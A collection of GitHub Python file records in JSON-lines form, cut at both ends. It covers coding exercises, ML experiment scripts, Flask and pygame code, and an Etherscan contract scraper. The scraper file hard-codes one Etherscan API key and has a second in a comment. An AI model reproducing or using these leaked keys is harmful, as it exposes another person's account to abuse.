1\n right = i + 1\n while right < len(h) and h[right] >= h[i]:\n size += 1\n right += 1\n if size*h[i] > largest:\n largest = size*h[i]\n\n return largest\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = int(input())\n\n h = list(map(int, input().rstrip().split()))\n\n result = largestRectangle(h)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()","repo_name":"JapneetSingh98/CodingPractice","sub_path":"HR_Python/miscellaneous/largestRectangle.py","file_name":"largestRectangle.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9146603045","text":"import itertools\nexperiment_sets = [\n {\n 'aow': ('arch.area_object_weight', range(-1, 4)),\n 'cos': ('arch.cosine_sim', [False])\n },\n # {\n # 'apw': ('arch.area_pool_weight', range(-4, 3)),\n # 'cos': ('arch.cosine_sim', [True, False])\n # },\n]\n\nfor experiment_set in experiment_sets:\n configs = itertools.product(*[v[1] for v in experiment_set.values()])\n for conf in configs:\n exp_join = \"_\".join([f'{k}{cv}' for k, cv in zip(experiment_set, conf)])\n one_e = '1e'\n empty = ''\n para_join = \" \".join([f'{v[0]} {empty if isinstance(cv, bool) else one_e}{cv}' for v, cv in zip(experiment_set.values(), conf)])\n print(f\"cfg=\\\"exp_name mspacman_atari_{exp_join} {para_join}\\\"\")\n print(\"exp_name=$(echo \\\"$cfg\\\" | cut -d \\\" \\\" -f 2)\")\n print(\"../log_execution.sh \\\"Training TcSpace ${exp_name}\\\" python main.py --task train\"\n \" --config configs/atari_mspacman.yaml ${cfg}\")\n","repo_name":"k4ntz/MOC","sub_path":"src/multi_experiment_gen.py","file_name":"multi_experiment_gen.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"6693947127","text":"# -*- coding: utf-8 -*-\n# Created by wushuyi on 2016/9/8 0008.\nfrom flask import Blueprint\nfrom flask import url_for, send_from_directory\nfrom flask_security import current_user\nfrom flask_security.utils import config_value\nfrom flask_security.decorators import _check_token\n\nbt = Blueprint('home', __name__)\n\n\n@bt.route('/')\ndef index():\n _check_token()\n user = current_user\n if user.is_anonymous:\n res = '

Hello, World!

{0}'.format(url_for('security.login'))\n else:\n res = '

Hello, {1}!

{0}'.format(url_for('security.logout'), user.name)\n return res\n\ndef configure(app):\n app.register_blueprint(bt)\n app.route\n","repo_name":"wushuyi/collie","sub_path":"collie/ext/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8671457409","text":"from slacker import Slacker\nimport socket\n\n### Set up slacker for status updates\nwith open('neurodata-slackr.conf', 'r') as fp:\n slack_token = fp.readline().strip()\n slack_channel = fp.readline().strip()\n\nslack = Slacker(slack_token)\n\nhost = socket.gethostname()\nslack.chat.post_message(slack_channel, f'`{host}`\\t Finished a run :partyparrot:')\n\n\n'''\nThe *.conf file should look like\n\n\n\n\n'''\n","repo_name":"neurodata/bohb_runs_sporf","sub_path":"msg.py","file_name":"msg.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"11642871843","text":"import numpy as np\nimport urllib \nimport matplotlib.pyplot as plt \nimport cv2\n\n#funcion to read image from url\ndef url2image(url):\n resp = urlopen(url) # download image from url\n image = np.asarray(bytearray(resp.read()),dtype ='uint8') #convert it to a Numpy array\n image = cv2.imdecode(image, cv2.IMREAD_COLOR) # read it into OpenCV format\n return image\nimport sys\nif sys.version_info[0] == 3:\n from urllib.request import urlopen\nelse:\n from urllib import urlopen\nimport os.path\n\n#Main\n#load image from url\nbgr_img = url2image('https://phunghuy.files.wordpress.com/2012/10/steve-jobs1.jpg?w=1140')\ngray_img = cv2.cvtColor(bgr_img, cv2.COLOR_BGR2GRAY)\nface_classifier_xml = 'my_haarcascade_frontalface_default.xml'\nret = os.path.exists(face_classifier_xml)\n\nif ret:\n print('the cascade classifier xml file already existed\\n')\nelse:\n print('downloading the cascade classifier xml file from internet...\\n')\n\nface_classifier_url = 'https://raw.githubusercontent.com/shantnu/Webcam-Face-Detect/master/'+'haarcascade_frontalface_default.xml'\n\nresp = urlopen(face_classifier_url)\ndata=resp.read()\nfh = open(face_classifier_xml, 'wb')\n\nfh.write(data)\nfh.close()\nresp.close()\n\nface_cascade = cv2.CascadeClassifier(face_classifier_xml)\nfaces = face_cascade.detectMultiScale(gray_img, 1.25, 3)\nfor(x,y,w,h) in faces:\n cv2.rectangle(bgr_img,(x,y),(x+w,y+h),(255,0,0),2)\n \nplt.axis('off')\nplt.title('face detecion result')\nplt.imshow(cv2.cvtColor(bgr_img,cv2.COLOR_BGR2RGB))\nplt.show()\n","repo_name":"edwardphuc/Machine-Learning-Basic","sub_path":"Document of Big Data and Deep Learning Lab/Face Detection.py","file_name":"Face Detection.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37912752881","text":"# --------------\n#Importing header files\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n#Code starts here\r\n\r\ndata = pd.read_csv(path,sep=',')\r\nprint(data.head(5))\r\nprint(data.columns)\r\n\r\nloan_status = data['Loan_Status'].value_counts()\r\nprint(loan_status)\r\nprint(type(loan_status))\r\n\r\nloan_status.plot(kind='bar')\r\nplt.show()\n\n\n# --------------\n#Code starts here\r\nimport pandas as pd \r\nimport matplotlib.pyplot as plt \r\n\r\nprint(data.columns)\r\nprint(data.head(5))\r\n\r\nproperty_and_loan = data.groupby(['Property_Area','Loan_Status'])\r\nprint(property_and_loan)\r\n\r\nproperty_and_loan = property_and_loan.size().unstack()\r\nprint(property_and_loan)\r\n\r\nproperty_and_loan.plot(kind='bar',stacked=False,figsize=(15,10))\r\nplt.xlabel(\"Property Area\")\r\nplt.ylabel(\"Loan Status\")\r\nplt.title(\"Loan Approval Distribution across the regions\")\r\nplt.xticks(rotation=45)\r\n\r\nplt.show()\n\n\n# --------------\n#Code starts here\r\nimport pandas as pd \r\nimport matplotlib.pyplot as plt \r\n\r\nprint(data.head(1))\r\nprint(data.columns)\r\n\r\neducation_and_loan = data.groupby(['Education','Loan_Status'])\r\nprint(education_and_loan)\r\n\r\neducation_and_loan = education_and_loan.size().unstack()\r\nprint(education_and_loan)\r\n\r\neducation_and_loan.plot(kind='bar',stacked=True,figsize=(15,10))\r\nplt.xlabel(\"Education Status\")\r\nplt.ylabel(\"Loan Status\")\r\nplt.xticks(rotation=45)\r\nplt.title(\"Relating Higher Education in Issuing Loans\")\r\n\r\nplt.show()\n\n\n# --------------\n#Code starts here\r\nimport pandas as pd \r\nimport matplotlib.pyplot as plt\r\n\r\nprint(data.head(1))\r\nprint(data.columns)\r\n\r\ngraduate = data[data[\"Education\"] == \"Graduate\"]\r\n#print(graduate)\r\nprint(type(graduate))\r\n\r\nnot_graduate = data[data[\"Education\"] == \"Not Graduate\"]\r\n#print(not_graduate)\r\nprint(type(not_graduate))\r\n\r\ngraduate[\"LoanAmount\"].plot(kind='density',label='Graduate')\r\n\r\nnot_graduate[\"LoanAmount\"].plot(kind='density',label='Not Graduate')\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#Code ends here\r\n\r\n#For automatic legend display\r\nplt.legend()\n\n\n# --------------\n#Code starts here\r\nimport pandas as pd \r\nimport matplotlib.pyplot as plt \r\n\r\ndata['TotalIncome'] = data['ApplicantIncome'] + data['CoapplicantIncome']\r\nprint(data.columns)\r\nprint(data.head(2))\r\nfig, (ax_1,ax_2,ax_3) = plt.subplots(nrows = 3, ncols=1, figsize=(20,8))\r\n\r\n'''\r\nplt.scatter(data[\"ApplicantIncome\"],data[\"LoanAmount\"])\r\nplt.title(\"Applicant Income\")\r\n\r\ndata.plot.scatter(x=\"ApplicantIncome\",y=\"LoanAmount\")\r\nplt.ax_1.title(\"Applicant Income\")\r\n\r\ndata.plot.scatter(x=\"CoapplicantIncome\",y=\"LoanAmount\")\r\nplt.ax_2.title(\"Coapplicant Income\")\r\n\r\ndata.plot.scatter(x='TotalIncome',y='LoanAmount')\r\nplt.ax_3.title(\"Total Income\")\r\n'''\r\nax_1.scatter(data[\"ApplicantIncome\"],data[\"LoanAmount\"])\r\nax_1.set(title=\"Applicant Income\")\r\n\r\nax_2.scatter(data[\"CoapplicantIncome\"],data[\"LoanAmount\"])\r\nax_2.set(title=\"Coapplicant Income\")\r\n\r\nax_3.scatter(data['TotalIncome'],data['LoanAmount'])\r\nax_3.set(title=\"Total Income\")\r\n\r\nplt.show()\n\n\n","repo_name":"pavanmakineni/ga-learner-dsb-repo","sub_path":"Visualization-for-company-stakeholders/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":2953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6254452144","text":"import logging\nlogging.getLogger().setLevel(logging.INFO)\n\nimport os\nimport copy\nimport random\nimport argparse\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import log_loss, accuracy_score\nimport numpy as np\nimport math\n\nfrom mcr.recourse import recourse_population, save_recourse_result\nfrom mcr.causality.scm import BinomialBinarySCM, SigmoidBinarySCM\n\n\ndef load_problem(path, type='binomial'):\n scm = None\n if type == 'binomial':\n scm = BinomialBinarySCM.load(path)\n elif type == 'sigmoid':\n scm = SigmoidBinarySCM.load(path)\n else:\n raise NotImplementedError('only binomial or sigmoid')\n y_name = scm.predict_target\n return scm, y_name\n\n\ndef run_robustness_experiment(savepath, scm, y_name, gamma, eta, lbd, thresh, costs, N, model_type='logreg'):\n\n # GENERATE THREE BATCHES OF DATA\n\n noise = scm.sample_context(N)\n df = scm.compute()\n\n X = df[df.columns[df.columns != y_name]]\n y = df[y_name]\n\n batch_size = math.floor(N / 3)\n\n logging.info('Creating three batches of data with {} observations'.format(batch_size))\n\n batches = []\n i = 0\n\n while i < N:\n X_i, y_i = X.iloc[i:i + batch_size, :], y.iloc[i:i + batch_size]\n U_i = noise.iloc[i:i + batch_size, :]\n batches.append((X_i, y_i, U_i))\n i += batch_size\n\n # FITTING MODEL 1 ON BATCH 0\n\n logging.info('Fitting a model on batch 0')\n\n model = None\n if model_type == 'logreg':\n model = LogisticRegression()\n elif model_type == 'rf':\n rf = RandomForestClassifier(n_estimators=5)\n model = rf\n\n model.fit(batches[0][0], batches[0][1])\n # assert model.predict_proba([[0, 0, 0, 0, 0, 1, 1, 1, 1]])[0][1] > 0.95\n\n model.predict(batches[1][0])\n\n perf1 = log_loss(batches[0][1], model.predict_proba(batches[0][0]))\n perf2 = accuracy_score(batches[0][1], model.predict(batches[0][0]))\n\n\n # EXPERIMENTS\n\n r_types = ['individualized', 'subpopulation']\n t_types = ['improvement', 'acceptance']\n\n\n ## How well does the model predict in different pre- and post-recourse enviornments?\n ## How meaningful is the recourse? (i.e. what is the improvement probability)\n ## What is the acceptance probability?\n\n # t_type = 'improvement'\n # r_type = 'individualized'\n\n for r_type in r_types:\n for t_type in t_types:\n savepath_run = savepath + '{}_{}/'.format(t_type, r_type)\n\n try:\n os.mkdir(savepath_run)\n except FileExistsError as err:\n logging.info('Folder {} already exists'.format(savepath_run))\n except Exception as err:\n print('could not create folder.')\n raise err\n\n logging.info('Recourse type: {}, {}'.format(r_type, t_type))\n\n ## Perform CR on batches 1 and 2\n\n logging.info('Batches 1 and 2 are replace with post-recourse data')\n logging.info('Batch 0 is left as-is')\n\n # for batches 1 and 2 recourse is performed\n result_tuples = []\n\n for ii in [1, 2]:\n tpl = recourse_population(scm, batches[ii][0], batches[ii][1],\n batches[ii][2], y_name, costs,\n proportion=0.8, r_type=r_type,\n t_type=t_type, gamma=gamma, eta=eta,\n lbd=lbd,\n thresh=thresh,\n subpopulation_size=200,\n model=model,\n use_scm_pred=False)\n result_tuples.append(tpl)\n U, X_pre, y_pre, y_hat_pre, interventions, X_post, y_post, h_post, costss, stats = tpl\n logging.info(stats)\n\n save_recourse_result(savepath_run + 'batch1_', result_tuples[0])\n save_recourse_result(savepath_run + 'batch2_', result_tuples[1])\n\n ## Application to batch 2\n ## refitting model on batch 0 and 1\n ## computing recourse on batch 2 with respect to original model\n ## assessing whether recourse is honored by the new model\n\n logging.info('A second model is fit on batches 0 (pre-recourse) and 1 (post-recourse)')\n\n batches_post = copy.deepcopy(batches)\n\n for ii in [1, 2]:\n X_post, y_post = result_tuples[ii - 1][5], result_tuples[ii - 1][6]\n batches_post[ii][0].iloc[X_post.index, :] = X_post\n batches_post[ii][1].iloc[y_post.index] = y_post\n\n\n # fit model on batch 1\n # batch 0 post is identical to batch 0 pre\n X_train2 = batches_post[1][0]\n y_train2 = batches_post[1][1]\n\n model2 = None\n if model_type == 'logreg':\n model2 = LogisticRegression()\n elif model_type == 'rf':\n model2 = RandomForestClassifier(n_estimators=5)\n model2.fit(X_train2, y_train2)\n\n logging.info('The refit on pre- and post-recourse data has coefficients {}'.format(model2.coef_))\n\n models = [model, model2]\n\n for nr in [0, 1]:\n # np.savetxt(savepath_run + 'model{}_coef.csv'.format(nr), np.array(models[nr].coef_), delimiter=',')\n X_post_nr, y_post_nr = result_tuples[nr][5], result_tuples[nr][6]\n invs = result_tuples[nr][4]\n recourse_performed = invs[invs.sum(axis=1) >= 1].index\n X_post_nr = X_post_nr.loc[recourse_performed, :]\n y_post_nr = y_post_nr.loc[recourse_performed]\n\n if len(recourse_performed) > 0:\n predict2 = models[nr].predict(X_post_nr)\n np.savetxt(savepath_run + 'predict{}.csv'.format(nr), predict2, delimiter=',')\n\n perf1 = log_loss(y_post_nr, model.predict_proba(X_post_nr), labels=[0, 1])\n perf2 = accuracy_score(y_post_nr, model.predict(X_post_nr))\n\n logging.info(\"Performance of refit on post-recourse data: {} log-loss and {}% accuracy\".format(perf1, perf2))\n\n # predict on batch 2 and see whether recourse is honored\n\n percentage_honored = np.mean(predict2)\n logging.info('-----')\n logging.info('Recourse honored only for {} per cent'.format(percentage_honored))\n logging.info('=====')\n\nif __name__ == '__main__':\n # DEFINE LOGGING LEVEL\n\n # logging.getLogger().setLevel(logging.INFO)\n # parsing command line arguments\n parser = argparse.ArgumentParser(\"Create recourse experiments. \" +\n \"For every configuration a separate folder is created. \" +\n \"Within every folder a folder for every interation is created.\" +\n \"The savepath specifies the folder in which these folders shall be placed.\")\n\n parser.add_argument(\"scm_loadpath\", help=\"loadpath for scm to be used\", default=None, type=str)\n parser.add_argument(\"gamma\", help=\"gammas for recourse\", type=float)\n parser.add_argument(\"lbd\", help=\"lambda for optimization\", default=10.0, type=float)\n parser.add_argument(\"thresh\", help=\"threshs for prediction and recourse\", type=float)\n parser.add_argument(\"N\", help=\"Number of observations\", type=int)\n parser.add_argument(\"savepath\",\n help=\"savepath for the experiment folder. either relative to working directory or absolute.\",\n type=str)\n\n parser.add_argument(\"--seed\", help=\"seed\", default=42, type=int)\n parser.add_argument(\"--logging_level\", help=\"logging-level\", default=20, type=int)\n parser.add_argument(\"--scm_type\", help=\"class of scm\", default='binomial', type=str)\n parser.add_argument(\"--model_type\", help='ml model class', default='logreg', type=str)\n\n args = parser.parse_args()\n\n # set logging settings\n logging.getLogger().setLevel(args.logging_level)\n random.seed(args.seed)\n\n scm, y_name = load_problem(args.scm_loadpath, type=args.scm_type)\n costs = np.load(args.scm_loadpath + 'costs.npy')\n\n # expects that we are in a directory with a subfolder called \"experiments\"\n # relative save paths\n config_id = random.randint(0, 1024)\n savepath_config = args.savepath + 'gamma_{}_N_{}_id_{}/'.format(args.gamma, args.N, config_id)\n\n n_tries = 0\n done = False\n while n_tries < 5 and not done:\n try:\n n_tries += 1\n os.mkdir(savepath_config)\n done = True\n except Exception as err:\n logging.warning('Could not generate folder...{}'.format(savepath_config))\n\n run_robustness_experiment(savepath_config, scm, y_name, args.gamma, args.gamma, args.lbd, args.thresh, costs,\n args.N, model_type=args.model_type)\n","repo_name":"anonomyzed-submission/mcr","sub_path":"scripts/experiment-robustness.py","file_name":"experiment-robustness.py","file_ext":"py","file_size_in_byte":9048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40465008651","text":"import urllib.request\r\nimport json\r\nimport time\r\nimport os\r\nfrom multiprocessing import Process,Queue\r\nfrom tqdm import tqdm\r\nfrom token_info import token_list as token\r\n\r\nbase_url = \"https://api.etherscan.io/api?module=contract&action=getsourcecode\"\r\napikey = \"&apikey=68I2GBGUU79X6YSIMA8KVGIMYSKTS6UDPI\" # input your api key, you can get it from https://etherscan.io/myapikey\r\n\r\n\r\ndef producer(q,path):\r\n\r\n local_addrs = set()\r\n for addr in os.listdir(os.path.join(path,'raws')):\r\n local_addrs.add(addr)\r\n print('local',len(local_addrs))\r\n\r\n contracts = []\r\n with open(os.path.join(path,'htmls.json'), 'r') as fr:\r\n line = fr.readline()\r\n while line != '':\r\n c = json.loads(line)\r\n if c['address'] not in local_addrs:\r\n contracts.append(c)\r\n line = fr.readline()\r\n fr.close()\r\n\r\n for c in tqdm(contracts):\r\n q.put(c)\r\n time.sleep(0.2)\r\n\r\n\r\ndef consumer(q,path):\r\n\r\n while 1:\r\n c = q.get()\r\n if c:\r\n _request_one(c['address'],os.path.join(path,'raws'))\r\n else:\r\n time.sleep(0.1)\r\n break\r\n\r\ndef _request_one(addr,save_path):\r\n url = base_url + apikey + \"&address=\" + addr\r\n request = urllib.request.Request(url)\r\n reponse = urllib.request.urlopen(request, timeout=10).read() # 10s timeout\r\n r = json.loads(reponse.decode('utf-8'))\r\n\r\n if r['status'] == '1' and r['message'] == 'OK':\r\n with open(os.path.join(save_path, addr), 'w') as fw:\r\n fw.write(json.dumps(r))\r\n fw.close()\r\n\r\n # Proxy == 1\r\n r = r['result'][0]\r\n if r['Proxy'] == '1' and r['Implementation'] != '':\r\n _request_one(r['Implementation'],save_path)\r\n\r\n elif r['status'] == '0' and r['message'] == 'NOTOK':\r\n if r['result'] == \"Max rate limit reached\":\r\n print('Max rate limit reached')\r\n _request_one(addr,save_path)\r\n else:\r\n print(addr,json.dumps(r))\r\n\r\nif __name__ == \"__main__\":\r\n \r\n #path = token['20'].path\r\n path = token['721'].path\r\n #path = token['1155'].path\r\n\r\n q = Queue(5)\r\n\r\n p1 = Process(target=producer,args=(q,path))\r\n\r\n c1 = Process(target=consumer,args=(q, path))\r\n c2 = Process(target=consumer, args=(q, path))\r\n c3 = Process(target=consumer, args=(q, path))\r\n c4 = Process(target=consumer, args=(q, path))\r\n c5 = Process(target=consumer, args=(q, path))\r\n\r\n tasks = [p1,c1,c2,c3,c4,c5]\r\n [t.start() for t in tasks]\r\n\r\n p1.join()\r\n q.put(None)\r\n q.put(None)\r\n q.put(None)\r\n q.put(None)\r\n q.put(None)\r\n print('finish')\r\n\r\n #crytic-compile '0x009c43b42aefac590c719e971020575974122811' --export-dir 'tokens' --etherscan-apikey 99111UXSQPVIU93JMZIHC3ZNFN4JQGDJ77 --etherscan-only-source-code","repo_name":"d0scoo1/Naga","sub_path":"tools/etherscan_spider/2_raw_request.py","file_name":"2_raw_request.py","file_ext":"py","file_size_in_byte":2820,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"28879084506","text":"import pygame\nimport os\n\npygame.font.init()\n\nWIDTH, HEIGHT = 1920, 1080\nWIN = pygame.display.set_mode((WIDTH,HEIGHT))\npygame.display.set_caption(\"First Game\")\n\nWHITE = (255,255,255)\nBLACK = (0, 0, 0)\nRED = (255, 0, 0)\nYELLOW = (255, 255, 0)\n\nHEALTH_FONT = pygame.font.SysFont('comicsans', 50)\n\nROUND_HIT = pygame.USEREVENT + 1\nSQUARE_HIT = pygame.USEREVENT + 2\n\nFPS = 60\nVELOCITY = 20\n\nBORDER = pygame.Rect(WIDTH//2, 0, 10, HEIGHT)\nBULLET_VEL = 16\nMAX_BULLETS = 3\n\nFACE_W, FACE_H = 100, 100\n\nROUNDFACE = pygame.image.load(os.path.join('Assets', 'happysad.png'))\nROUNDFACE = pygame.transform.scale(ROUNDFACE, (FACE_W,FACE_H))\n\nSQUAREFACE = pygame.image.load(os.path.join('Assets', 'square.png'))\nSQUAREFACE = pygame.transform.scale(SQUAREFACE, (FACE_W,FACE_H))\n\nBACKGROUND = pygame.transform.scale(pygame.image.load(os.path.join('Assets', 'BackGround.png')), (WIDTH,HEIGHT))\n\n\ndef draw_window(round, square, round_bullets, square_bullets, round_health, square_health):\n WIN.blit(BACKGROUND,(0,0))\n pygame.draw.rect(WIN, BLACK, BORDER)\n\n round_health_text = HEALTH_FONT.render(\"Health: \" + str(round_health), 1, WHITE)\n\n square_health_text = HEALTH_FONT.render(\"Health: \" + str(square_health), 1, WHITE)\n\n WIN.blit(round_health_text, (WIDTH - round_health_text.get_width() - 10, 10))\n WIN.blit(square_health_text, (10,10))\n WIN.blit(ROUNDFACE, (round.x,round.y))\n WIN.blit(SQUAREFACE, (square.x,square.y))\n \n for bullet in round_bullets:\n pygame.draw.rect(WIN, RED, bullet)\n for bullet in square_bullets:\n pygame.draw.rect(WIN, YELLOW, bullet)\n pygame.display.update()\n\n\ndef roundMovement(keys_pressed, round):\n if keys_pressed[pygame.K_a] and round.x - VELOCITY > 0:\n round.x -= VELOCITY\n if keys_pressed[pygame.K_d] and round.x + VELOCITY + round.width < BORDER.x:\n round.x += VELOCITY\n if keys_pressed[pygame.K_w] and round.y - VELOCITY > 0:\n round.y -= VELOCITY\n if keys_pressed[pygame.K_s] and round.y + VELOCITY + round.height < HEIGHT - 60:\n round.y += VELOCITY\n\n\n\ndef squareMovement(keys_pressed, square):\n if keys_pressed[pygame.K_LEFT] and square.x - VELOCITY > BORDER.x + BORDER.width:\n square.x -= VELOCITY\n if keys_pressed[pygame.K_RIGHT] and square.x + VELOCITY + square.width < WIDTH:\n square.x += VELOCITY\n if keys_pressed[pygame.K_UP] and square.y - VELOCITY > 0:\n square.y -= VELOCITY\n if keys_pressed[pygame.K_DOWN] and square.y + VELOCITY + square.height < HEIGHT - 60:\n square.y += VELOCITY\n\n\ndef handle_bullets(round_bullets, square_bullets, round, square):\n for bullet in round_bullets:\n bullet.x += BULLET_VEL\n if square.colliderect(bullet):\n pygame.event.post(pygame.event.Event(SQUARE_HIT))\n round_bullets.remove(bullet)\n elif bullet.x > WIDTH:\n round_bullets.remove(bullet)\n\n for bullet in square_bullets:\n bullet.x -= BULLET_VEL\n if round.colliderect(bullet):\n pygame.event.post(pygame.event.Event(ROUND_HIT))\n square_bullets.remove(bullet)\n elif bullet.x < 0:\n square_bullets.remove(bullet)\n\n\ndef main():\n round = pygame.Rect(300,100,FACE_W, FACE_H)\n square = pygame.Rect(1300,100,FACE_W, FACE_H)\n\n bullets = []\n round_bullets = []\n square_bullets = []\n\n round_health = 10\n square_health = 10\n\n clock = pygame.time.Clock()\n run = True\n while run:\n\n clock.tick(FPS)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n \n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LCTRL and len(round_bullets) < MAX_BULLETS:\n bullet = pygame.Rect(\n round.x + round.width, round.y + round.height//2 - 2, 10, 5)\n round_bullets.append(bullet)\n\n if event.key == pygame.K_RCTRL and len(square_bullets) < MAX_BULLETS:\n bullet = pygame.Rect(\n square.x, square.y + square.height//2 - 2, 10, 5)\n square_bullets.append(bullet)\n\n if event.type == SQUARE_HIT:\n round_health -= 1\n \n if event.type == ROUND_HIT:\n square_health -= 1\n \n winner_text = \"\"\n if round_health <= 0:\n winner_text = \"Square wins\"\n\n if square_health <= 0:\n winner_text = \"Round wins\"\n\n if winner_text != \"\":\n pass\n\n\n keys_pressed = pygame.key.get_pressed()\n roundMovement(keys_pressed, round)\n squareMovement(keys_pressed, square)\n\n handle_bullets(round_bullets,square_bullets, round, square)\n\n draw_window(round, square, round_bullets, square_bullets, round_health, square_health)\n\n pygame.quit()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Dorfultariant/SampleGame","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8269689940","text":"import sys\n\nn = int(input())\narray = [0]\nfor _ in range(n):\n array.append(int(sys.stdin.readline()))\n\ndp = [0] * (n + 1)\nfor i in range(1, n + 1):\n if i == 1:\n dp[i] = array[1]\n elif i == 2:\n dp[i] = array[1] + array[2]\n else:\n dp[i] = max(dp[i - 1], dp[i - 2] + array[i], dp[i - 3] + array[i - 1] + array[i])\n\nprint(dp[n])","repo_name":"s2lee/PS","sub_path":"BOJ/Dynamic Programming/2156.py","file_name":"2156.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23769125626","text":"from typing import Dict\n\nimport torch.cuda\nfrom torch.utils.data import DataLoader\nfrom torch import nn, Tensor, optim\nfrom tqdm import tqdm\nimport json\nimport torch\nimport time\nfrom models.gpt2_prompt_models import SpanStopPredictor\nfrom gpt2_prompt_predictor import Predictor\nfrom loggers.csv_logger import CSVLogger\n\n\nclass SpanOnlyTrainer:\n def __init__(self,\n tokenizer,\n gpt2: nn.Module,\n span_predictor: nn.Module,\n span_optimizer: optim.Optimizer,\n span_loss_name: str,\n span_loss: nn.Module,\n stop_as_negative_span: bool,\n train_span_only_csv_file_path: str,\n eval_span_only_csv_file_path: str,\n evaluation_scores_file_path: str,\n eval_frequency: int):\n self.tokenizer = tokenizer\n self.gpt2 = gpt2\n self.span_predictor = span_predictor\n self.span_optimizer = span_optimizer\n self.span_loss = span_loss\n self.predictor = Predictor(tokenizer, gpt2, SpanStopPredictor(self.span_predictor), span_predictor, span_loss_name)\n self.stop_as_negative_span = stop_as_negative_span\n self.train_csv_logger = CSVLogger(train_span_only_csv_file_path, None)\n self.eval_csv_logger = CSVLogger(eval_span_only_csv_file_path, None)\n self.evaluation_scores_file_path = evaluation_scores_file_path\n self.eval_frequency = eval_frequency\n\n def train_span(self, encoded_prompt: Dict[str, Tensor], true_spans: list, evaluate: bool):\n output = self.gpt2(encoded_prompt)\n pred_span = self.span_predictor(output)\n\n span_losses = [self.span_loss(pred_span[0], true_span.float()) for true_span in true_spans]\n span_loss, min_index = min((val, idx) for (idx, val) in enumerate(span_losses))\n if torch.cuda.is_available():\n span_loss.to('cuda:0', non_blocking=True)\n\n if not evaluate:\n self.gpt2.zero_grad()\n self.span_optimizer.zero_grad()\n span_loss.backward()\n self.span_optimizer.step()\n\n \"\"\"\n self.gpt2.zero_grad()\n self.span_optimizer.zero_grad()\n a1 = [x.clone() for x in self.gpt2.parameters()] + [x.clone() for x in self.span_predictor.parameters()]\n span_loss.backward()\n self.span_optimizer.step()\n b1 = [x.clone() for x in self.gpt2.parameters()] + [x.clone() for x in self.span_predictor.parameters()]\n for a, b in zip(a1, b1):\n x = torch.equal(a,b)\n y = torch.equal(a.data,b.data)\n if not x:\n print(x)\n if not y:\n print(y)\n \"\"\"\n\n return span_loss, pred_span[0], min_index\n\n def do_epoch(self, dataset: DataLoader, epoch: int, csv_logger: CSVLogger, evaluate: bool):\n for text_id, anchor_id, prep_id, prompt, spans in dataset:\n if torch.cuda.is_available():\n spans = spans.to('cuda:0', non_blocking=True)\n\n if type(prompt) == tuple:\n # weird bug, sometimes prompt is returned as tuple\n assert prompt[0] and len(prompt) == 1\n prompt = prompt[0]\n\n spans_to_check = list(spans[0]) # Or 1?\n while len(spans_to_check):\n encoded_input = self.tokenizer(prompt, return_tensors='pt')\n if torch.cuda.is_available():\n encoded_input = encoded_input.to('cuda:0')\n\n span_loss, pred_span, span_checked_index = self.train_span(encoded_input, spans_to_check, evaluate)\n span_checked = spans_to_check[span_checked_index]\n\n span_start, span_end = span_checked[0].item(), span_checked[1].item()\n pred_start, pred_end = pred_span[0].item(), pred_span[1].item()\n csv_logger.log_span(epoch, text_id[0], anchor_id[0], prep_id[0],\n span_start, span_end,\n pred_start, pred_end,\n span_loss.item())\n del spans_to_check[span_checked_index]\n\n prompt += f' ({span_checked[0].item()},{span_checked[1].item()})'\n\n if self.stop_as_negative_span:\n encoded_input = self.tokenizer(prompt, return_tensors='pt')\n end_span = -torch.ones(2)\n\n if torch.cuda.is_available():\n encoded_input = encoded_input.to('cuda:0')\n end_span = end_span.to('cuda:0')\n end_span.unsqueeze(0).repeat(spans.shape[0], 1)\n\n span_loss, pred_span, span_checked_index = self.train_span(encoded_input, [end_span], evaluate)\n span_checked = spans_to_check[span_checked_index]\n\n span_start, span_end = span_checked[0].item(), span_checked[1].item()\n pred_start, pred_end = pred_span[0].item(), pred_span[1].item()\n csv_logger.log_span(epoch, text_id[0], anchor_id[0], prep_id[0],\n span_start, span_end,\n pred_start, pred_end,\n span_loss.item())\n\n def train(self, train_dataset: DataLoader, eval_ds_for_loss: DataLoader, eval_ds_for_metrics: DataLoader, epochs: int):\n epochs_progress_bar = tqdm(range(epochs))\n evaluation_labeled_f1_per_epoch = []\n evaluation_unlabeled_f1_per_epoch = []\n for epoch in epochs_progress_bar:\n self.span_predictor.train()\n self.gpt2.train()\n epochs_progress_bar.set_description(\"Epoch %d\" % (epoch+1))\n\n print(f\"SpanOnly_trainer - training on train dataset... epoch {epoch+1}\")\n start = time.time()\n self.do_epoch(train_dataset, epoch, self.train_csv_logger, False)\n end = time.time()\n print(f\"SpanOnly_trainer - training 